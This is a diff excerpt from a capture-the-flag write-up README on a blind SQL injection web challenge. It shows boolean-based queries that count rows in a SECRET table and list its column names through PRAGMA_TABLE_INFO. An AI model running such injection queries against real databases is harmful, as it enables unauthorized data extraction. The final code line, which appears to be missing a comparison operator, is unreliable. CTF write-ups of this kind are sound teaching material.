0x-Matthias/CTF-Writeups/BlueHens_2023/web/Why lie: Blind SQL/README.md

 guess('SELECT 1 FROM numbers WHERE (SELECT count(*) FROM SECRET) = 2') # True
 ```

+Now we need the column names of the SECRET table to be able to retrieve their values using a boolean based query.
+That's why we want to query the `name` column of the `PRAGMA_TABLE_INFO('SECRET')` statement, which returns all the column names of the specified table:

-Then we managed to fix the column count to `1`:
+We managed to fix the column count to `1` using:
 ```python
 def check_column_count(table_name, expected_count):
 	col_count_res = guess("SELECT 1 FROM numbers WHERE (SELECT count(*) FROM (SELECT name FROM PRAGMA_TABLE_INFO('" + table_name + "'))) " + str(expected_count)))